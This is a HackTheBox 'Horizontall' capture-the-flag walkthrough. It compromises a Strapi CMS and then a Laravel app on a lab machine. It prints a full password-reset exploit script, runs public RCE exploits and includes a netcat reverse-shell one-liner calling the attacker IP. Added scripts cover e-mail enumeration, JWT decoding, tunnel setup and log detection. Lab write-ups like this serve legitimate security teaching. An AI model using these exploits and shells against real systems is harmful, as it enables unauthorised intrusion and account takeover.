
HTB Walkthrough : Horizontall

pentestsky

Last updated on March 1, 2022

Today we are going to solve another challenge from HackTheBox named "Horizontall". The box is built around Strapi, an open-source JavaScript headless CMS for creating, managing and exposing content to any digital client, with a Laravel application tucked away behind it, so without wasting any time let's start the journey.

Level : Medium

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Sub-Domain
    • Strapi Enumeration
  • Exploitation
    • Strapi JWT via password reset (CVE-2019-18818)
    • Strapi 3.0.0 RCE (CVE-2019-19609)
  • Privilege Escalation
    • Port Forwarding
    • Chisel
    • Laravel Exploitation (CVE-2021-3129)

Walkthrough

IP Address : 10.129.168.142

We start with an Nmap scan, which reveals two open ports, 22 (SSH) and 80 (HTTP). Nmap also shows that port 80 redirects to the "horizontall.htb" domain, so we add an entry for it to /etc/hosts so that the name resolves to the target.

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.129.168.142
# Nmap 7.91 scan initiated Mon Aug 30 13:21:03 2021 as: nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.129.168.142
Nmap scan report for 10.129.168.142
Host is up (0.51s latency).
Not shown: 65332 filtered ports, 201 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Once the hosts entry is in place and we visit the domain, we find a simple website on which most of the links are dead, and content discovery lists nothing of interest.

So the next step is to enumerate the website manually. Opening the browser's inspector, we find a JavaScript file that references a new host, "api-prod.horizontall.htb".

Time to add that name to /etc/hosts as well so traffic can reach it. This tells us that virtual hosting is in use on this machine: nginx serves a different site depending on the Host header. Visiting the new host returns a bare API with a "Welcome" message.

From past experience we try a few common paths such as admin and robots.txt, and luckily /admin exists and identifies the running CMS as Strapi. Strapi's documentation gives us the endpoint that reports the running version.

Version

http://api-prod.horizontall.htb/admin/strapiVersion

The query reports Strapi 3.0.0-beta.17.4. A quick search and a look at CVE Details list several vulnerabilities for this release.

Exploitation

Now it's time to exploit the service. The RCE exploit we found on GitHub needs an admin JWT, so we first need control of an admin account. This Strapi release is also vulnerable to an unauthenticated password reset (CVE-2019-18818): the /admin/auth/reset-password handler never checks that the reset `code` is a string, so sending an empty JSON object instead of the secret token makes the token lookup effectively unconstrained, the admin's password is overwritten and a fresh JWT is returned, without ever receiving the reset e-mail. We were stuck here for a while, but after some research we were able to get the JWT with the short script below. The script needs the admin's e-mail address. The forgot-password page asks for an e-mail, so we tried a few default addresses such as [email protected] and [email protected]; when we submitted [email protected] the site took a very long time to respond, which suggested this was the valid address (presumably the server stalls while trying to send the reset mail).
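That slow response is a classic user-enumeration oracle, and it can be turned into a small, repeatable probe. The script below is an added example, not the author's exploit and not Strapi code: it times one forgot-password request per candidate address and flags the ones that stall or time out relative to the others. The /admin/auth/forgot-password path is assumed from Strapi 3's admin route layout, the candidate addresses are placeholders (the real ones are redacted on this page), and the `send` parameter lets the timing logic run offline against constructed results.

```python
import statistics
import sys
import time
from typing import Callable, Dict, Iterable, List, Tuple

# (HTTP status, seconds elapsed); status 0 means the request timed out
ProbeResult = Tuple[int, float]

# Placeholder candidates (assumption): the addresses the author tried are redacted on the page
CANDIDATES = [
    "admin@horizontall.htb",
    "root@horizontall.htb",
    "webmaster@horizontall.htb",
]


def send_reset_request(base_url: str, email: str, timeout: float = 15.0) -> ProbeResult:
    """Time one forgot-password request. Network use only; the offline functions never call it.
    The /admin/auth/forgot-password path is an assumption taken from the Strapi 3 admin routes."""
    import requests  # imported here so the offline functions have no network dependency

    body = {
        "email": email,
        "url": f"{base_url}/admin/plugins/users-permissions/auth/reset-password",
    }
    start = time.monotonic()
    try:
        resp = requests.post(f"{base_url}/admin/auth/forgot-password", json=body, timeout=timeout)
        status = resp.status_code
    except requests.exceptions.Timeout:
        status = 0
    return status, time.monotonic() - start


def probe_all(candidates: Iterable[str], send: Callable[[str], ProbeResult]) -> Dict[str, ProbeResult]:
    """Run the probe for every candidate, preserving order so the results can be compared."""
    return {email: send(email) for email in candidates}


def slow_candidates(results: Dict[str, ProbeResult], factor: float = 3.0) -> List[str]:
    """Flag addresses whose request timed out or took more than `factor` times the median of the
    answered requests. The quick answers are the baseline for a non-existent address; the one that
    stalls is the one the server is trying to send mail to, as the author observed."""
    answered = [elapsed for status, elapsed in results.values() if status != 0]
    baseline = statistics.median(answered) if answered else 0.0
    flagged = []
    for email, (status, elapsed) in results.items():
        if status == 0 or (baseline > 0 and elapsed > factor * baseline):
            flagged.append(email)
    return flagged


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://api-prod.horizontall.htb"
    results = probe_all(CANDIDATES, lambda e: send_reset_request(base, e))
    for email, (status, elapsed) in results.items():
        print(f"{email:35} status={status:3} elapsed={elapsed:6.2f}s")
    print("likely valid:", slow_candidates(results))
```

Run it with the API base URL as the only argument. Comparing against the median rather than a fixed threshold keeps the probe usable on a slow link such as the 0.5 s latency Nmap reported for this box.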

import requests
import sys
import json

args = sys.argv

if len(args) < 4:
    print("Usage: {} <admin_email> <url> <new_password>".format(args[0]))
    exit(-1)

email = args[1]
url = args[2]
new_password = args[3]

s = requests.Session()

# Fingerprint the target: the unauthenticated version endpoint confirms a vulnerable 3.0.0-beta build
version = json.loads(s.get("{}/admin/strapiVersion".format(url)).text)

print("[*] Detected version(GET /admin/strapiVersion): {}".format(version["strapiVersion"]))

# Request a password reset for the admin address (sent exactly as in the original exploit)
print("[*] Sending password reset request...")
reset_request = {"email": email, "url": "{}/admin/plugins/users-permissions/auth/reset-password".format(url)}
s.post("{}/".format(url), json=reset_request)

# The bug: "code" is sent as an empty JSON object instead of the secret reset-token string.
# The handler never checks the type, so the token lookup matches the admin and the password is set.
print("[*] Setting new password...")
exploit = {"code": {}, "password": new_password, "passwordConfirmation": new_password}
r = s.post("{}/admin/auth/reset-password".format(url), json=exploit)

# On success the response carries a fresh admin JWT together with the user record
print("[*] Response:")
print(str(r.content))

Reading the reset script, it takes three arguments: the admin e-mail address, the base URL and the new password. Here they are "[email protected]", "http://api-prod.horizontall.htb" and "Password123". The response contains the admin JWT, so from here we can either log in to the admin panel with the new password or feed the token straight to the RCE exploit, which is what we do.

python get_JWT_exploit.py [email protected] http://api-prod.horizontall.htb Password123
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA5MTA2LCJleHAiOjE2MzMwMDExMDZ9.oVnuPDQP9RbdbdRns2SgF-Uy7xgci0LmVyNwR74mZ5Y","user":{"id":3,"username":"admin","email":"[email protected]","blocked":null}}
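Before spending the token it is worth reading what it says. This added example (not code from the page, the exploit or Strapi) decodes the JWT printed above without verifying it, reports the claims and lifetime, checks whether it is still usable at a given time, and builds the Authorization header later admin requests need. The token is the one returned above; nothing else is assumed.

```python
import base64
import json
import time
from typing import Any, Dict

# The token returned by the password-reset exploit above (copied from the page)
PAGE_JWT = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA5MTA2LCJleHAiOjE2MzMwMDExMDZ9."
    "oVnuPDQP9RbdbdRns2SgF-Uy7xgci0LmVyNwR74mZ5Y"
)


def _b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> Dict[str, Any]:
    """Split and decode header, payload and raw signature. No signature check is done: we do not
    hold the server's secret, we only want to read what the server put into the token."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected three dot-separated segments)")
    header_b64, payload_b64, signature_b64 = parts
    return {
        "header": json.loads(_b64url_decode(header_b64)),
        "payload": json.loads(_b64url_decode(payload_b64)),
        "signature": _b64url_decode(signature_b64),
    }


def lifetime_days(payload: Dict[str, Any]) -> float:
    """How long the server made the token valid for (exp minus iat, in days)."""
    return (payload["exp"] - payload["iat"]) / 86400


def is_usable(payload: Dict[str, Any], now: int) -> bool:
    """True while the token is inside its validity window and carries the admin flag that marks
    it as an admin-panel token rather than an ordinary users-permissions token."""
    return payload.get("isAdmin") is True and payload["iat"] <= now < payload["exp"]


def bearer_headers(token: str) -> Dict[str, str]:
    """Header the admin API expects, e.g. for the plugin-install endpoint the RCE exploit abuses."""
    return {"Authorization": f"Bearer {token}"}


if __name__ == "__main__":
    decoded = decode_jwt_unverified(PAGE_JWT)
    print("header   :", decoded["header"])
    print("payload  :", decoded["payload"])
    print(f"signature: {len(decoded['signature'])} bytes (HS256 gives 32)")
    print(f"lifetime : {lifetime_days(decoded['payload']):.0f} days")
    print("usable now:", is_usable(decoded["payload"], int(time.time())))
    print(bearer_headers(PAGE_JWT))
```

The payload shows id 3 with isAdmin set and a 30-day validity window, which is why a token minted during the box is still good for the rest of the session; it also shows that the token expires on its own and would need re-minting on a later attempt.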

Time to get a shell. An exploit for CVE-2019-19609 is available on GitHub: the admin panel's plugin install and uninstall endpoints pass the plugin name into a shell command without sanitising it, so anyone holding an admin JWT can inject arbitrary commands. We clone it, make it executable, start a netcat listener on port 9001 (nc -lvnp 9001) and run it.

git clone https://github.com/dasithsv/CVE-2019-19609.git
cd CVE-2019-19609
ls
chmod +x exploit.py
# python exploit.py <rhost> <lhost> <jwt> <url>
python exploit.py api-prod.horizontall.htb 10.10.14.71 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzM5Mjg0LCJleHAiOjE2MzI5MzEyODR9.1srDKN--euuzhW9cAFoRMzFeqD6-pMMB5cXMoKzqY3Q http://api-prod.horizontall.htb/ 

Once the exploit succeeds we get a reverse shell on our netcat listener on port 9001, running as the strapi user.

Privilege Escalation

Now that we have a shell, it's time to escalate. Enumerating SUID binaries and sudo rules turns up nothing, so we check netstat for services listening on localhost and find three: MySQL on 3306, and two more on ports 8000 and 1337. Port 1337 is Strapi's own default port and MySQL listens locally by default, so the next target is port 8000. To reach it we port-forward with chisel, an open-source tunnelling tool: we transfer the binary to the target, start the server on our Kali machine and then connect the client from the box.

netstat -tlnp
# On the attacker side (Kali), started first: listen on 8001 and allow reverse tunnels
./chisel server -p 8001 --reverse
# On the target side (as strapi): expose the box's 127.0.0.1:8000 as port 5000 on the attacker
./chisel client 10.10.14.71:8001 R:5000:127.0.0.1:8000

Once the client is connected we can browse to localhost port 5000 on our own machine, and it turns out to be a Laravel v8 application.
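netstat happened to be installed here, but on a stripped-down target it often is not, while the kernel's own socket table is always readable. The script below is an added example, not the author's tooling and not part of chisel: it parses the /proc/net/tcp format, lists sockets in LISTEN state, separates those bound only to loopback (the ones you cannot reach without a tunnel) and prints the matching chisel `R:` remote specs for the client command used above. The sample table is constructed to match the listeners the author found, the uids in it are made up, and the one-to-one port mapping is a choice (the page mapped 5000 to 8000).

```python
import os
from typing import List, NamedTuple

# Constructed /proc/net/tcp excerpt matching the listeners described on the page:
# sshd on 0.0.0.0:22, nginx on 0.0.0.0:80, MySQL 3306, Laravel 8000 and Strapi 1337 on 127.0.0.1,
# plus one established connection (state 01) that a listener scan must ignore.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18111 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   111        0 21320 1 0000000000000000 100 0 0 10 0
   2: 0100007F:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25677 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 25904 1 0000000000000000 100 0 0 10 0
   4: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18499 1 0000000000000000 100 0 0 10 0
   5: 8EA8810A:0050 470E0A0A:C4B2 01 00000000:00000000 00:00000000 00000000     0        0 31001 1 0000000000000000 20 4 30 10 -1
"""

LISTEN = "0A"  # TCP_LISTEN in the kernel's state encoding


class Listener(NamedTuple):
    ip: str
    port: int
    uid: int


def _hex_ipv4(h: str) -> str:
    """/proc/net/tcp stores IPv4 addresses as 8 hex digits in host byte order (little-endian on
    x86), so 0100007F is 127.0.0.1 once the octets are reversed."""
    octets = [int(h[i:i + 2], 16) for i in range(0, 8, 2)]
    return ".".join(str(o) for o in reversed(octets))


def parse_proc_net_tcp(text: str) -> List[Listener]:
    """Return every socket in LISTEN state as (ip, port, uid)."""
    listeners = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        fields = line.split()
        if len(fields) < 8 or fields[3] != LISTEN:
            continue
        addr_hex, port_hex = fields[1].split(":")
        listeners.append(Listener(_hex_ipv4(addr_hex), int(port_hex, 16), int(fields[7])))
    return listeners


def loopback_only(listeners: List[Listener]) -> List[Listener]:
    """Services bound to 127.0.0.0/8 are invisible from the network: tunnel candidates."""
    return [l for l in listeners if l.ip.startswith("127.")]


def chisel_remote_specs(listeners: List[Listener]) -> List[str]:
    """One R:<local>:<ip>:<remote> per loopback service, mapping ports one-to-one (a choice; the
    page mapped 5000 to 8000). All of them fit on a single `chisel client` command line."""
    return [f"R:{l.port}:{l.ip}:{l.port}" for l in sorted(loopback_only(listeners))]


if __name__ == "__main__":
    source = "/proc/net/tcp"
    text = open(source).read() if os.path.exists(source) else SAMPLE_PROC_NET_TCP
    found = parse_proc_net_tcp(text)
    for l in found:
        scope = "loopback only" if l.ip.startswith("127.") else "exposed"
        print(f"{l.ip:>15}:{l.port:<5} uid={l.uid:<5} {scope}")
    print("chisel client <attacker>:8001", " ".join(chisel_remote_specs(found)))
```

On a real target the script reads the live table; run it again against /proc/net/tcp6 if the service might be bound to ::1. The uid column is a bonus netstat -tlnp does not give an unprivileged user: it tells you which account a loopback service runs as before you bother tunnelling to it.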

Again with some help from Google and CVE Details we find vulnerabilities for this Laravel version. The relevant one is CVE-2021-3129, an unauthenticated RCE through the Ignition debug page that Laravel ships with, reachable whenever the application runs with APP_DEBUG enabled.

An exploit for CVE-2021-3129 is available on GitHub; it drives the Ignition "solution" endpoint with a phpggc gadget chain, here Monolog/RCE1. So we clone it and simply run it, first with id to confirm execution.

git clone https://github.com/nth347/CVE-2021-3129_exploit
cd CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:5000 Monolog/RCE1 id

The id output shows the application is running as root, so we already have root-level code execution. To turn it into a proper shell we execute a netcat reverse shell through the same exploit, with a listener waiting on port 1234 (nc -lvnp 1234), and then collect the user and root flags.

./exploit.py http://localhost:5000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 1234 >/tmp/f"
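From the defender's side this chain leaves a distinctive trail. The script below is an added example, not part of the page and not from the Laravel or Ignition projects: it runs a few detection rules over constructed nginx access-log and laravel.log lines shaped like the ones this exploit produces. The rules flag POSTs to the Ignition execute-solution endpoint, which only answers when debug mode is on, and error entries carrying php://filter or phar:// paths, which is how CVE-2021-3129 chains turn the application log into executable PHP. All log lines and timestamps are constructed; the source address is loopback because, as on this box, the traffic arrives through a tunnel.

```python
import re
from typing import List, NamedTuple

# Constructed nginx access-log lines (combined format). The exploit traffic arrives through the
# chisel tunnel, so the server sees it coming from loopback just like legitimate local traffic.
ACCESS_LOG = """\
127.0.0.1 - - [30/Aug/2021:14:01:58 +0000] "GET / HTTP/1.1" 200 2541 "-" "Mozilla/5.0"
127.0.0.1 - - [30/Aug/2021:14:02:09 +0000] "GET /_ignition/health-check HTTP/1.1" 200 27 "-" "python-requests/2.25.1"
127.0.0.1 - - [30/Aug/2021:14:02:10 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.25.1"
127.0.0.1 - - [30/Aug/2021:14:02:10 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
127.0.0.1 - - [30/Aug/2021:14:02:11 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 123 "-" "python-requests/2.25.1"
127.0.0.1 - - [30/Aug/2021:14:03:00 +0000] "GET /login HTTP/1.1" 200 1020 "-" "Mozilla/5.0"
"""

# Constructed laravel.log entries. The vulnerable solution calls file_get_contents() on the
# attacker-supplied viewFile and the failure is logged, so the wrapper path lands in the log
# verbatim; the exploit relies on exactly that to stage its payload.
LARAVEL_LOG = """\
[2021-08-30 14:01:58] local.INFO: User viewed the landing page
[2021-08-30 14:02:10] local.ERROR: file_get_contents(php://filter/write=convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed
[2021-08-30 14:02:11] local.ERROR: file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: phar error
[2021-08-30 14:03:00] local.INFO: User logged in
"""

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LARAVEL_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \S+\.(?P<level>[A-Z]+): (?P<msg>.*)$")
WRAPPER_RE = re.compile(r"(php://filter|phar://)", re.IGNORECASE)


class Finding(NamedTuple):
    source: str
    severity: str
    timestamp: str
    reason: str


def scan_access_log(text: str) -> List[Finding]:
    """POST to execute-solution is the exploit itself; any other Ignition path proves debug is on."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?")[0]
        if path == "/_ignition/execute-solution" and m.group("method") == "POST":
            findings.append(Finding("nginx", "high", m.group("ts"),
                                    f"Ignition execute-solution called from {m.group('src')} "
                                    f"(status {m.group('status')})"))
        elif path.startswith("/_ignition/"):
            findings.append(Finding("nginx", "low", m.group("ts"),
                                    f"Ignition endpoint {path} reachable: debug mode is on"))
    return findings


def scan_laravel_log(text: str) -> List[Finding]:
    """A PHP stream wrapper inside a logged file path is never legitimate in production."""
    findings = []
    for line in text.splitlines():
        m = LARAVEL_RE.match(line)
        if not m:
            continue
        w = WRAPPER_RE.search(m.group("msg"))
        if w:
            findings.append(Finding("laravel", "high", m.group("ts"),
                                    f"stream wrapper {w.group(1)} in a logged file path"))
    return findings


def scan_all(access: str, laravel: str) -> List[Finding]:
    return scan_access_log(access) + scan_laravel_log(laravel)


if __name__ == "__main__":
    for f in scan_all(ACCESS_LOG, LARAVEL_LOG):
        print(f"[{f.severity:4}] {f.source:7} {f.timestamp}  {f.reason}")
```

Two points the output makes: the access log alone is enough to catch the attack even though nginx never records the POST body, and the fix is the same on every Laravel host, upgrade facade/ignition to 2.5.2 or later and keep APP_DEBUG off outside development.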

